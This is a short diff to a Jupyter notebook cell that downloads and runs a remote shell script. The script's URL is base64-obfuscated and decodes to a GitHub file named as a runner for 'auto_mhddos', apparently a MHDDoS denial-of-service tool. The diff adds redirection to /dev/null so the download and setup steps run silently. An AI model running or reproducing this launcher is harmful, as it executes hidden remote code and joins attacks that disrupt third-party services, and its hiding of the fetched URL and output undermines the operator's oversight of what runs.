--- a/main.ipynb
+++ b/main.ipynb
@@ -22,10 +22,10 @@
    "execution_count": null,
    "outputs": [],
    "source": [
-    "%cd ~\n",
+    "%cd -q ~\n",
     "name=\"_replace_me_with_unique_name_in_latin_\"\n",
-    "!wget -O {name}.sh $(echo aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3doaXRlLXNhZ2l0dGFyaXVzL2F1dG9fbWhkZG9zL2ZlYXR1cmUvZHluYW1pYy9ydW5uZXIubmV3LnNoCg== | base64 -d)\n",
-    "!echo 'echo \"{name}\"' >> {name}.sh\n",
+    "!wget -O {name}.sh $(echo aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3doaXRlLXNhZ2l0dGFyaXVzL2F1dG9fbWhkZG9zL2ZlYXR1cmUvZHluYW1pYy9ydW5uZXIubmV3LnNoCg== | base64 -d) &> /dev/null\n",
+    "!echo 'echo \"{name}\"' >> {name}.sh &> /dev/null\n",
     "!bash {name}.sh -e {name}"
    ],
    "metadata": {
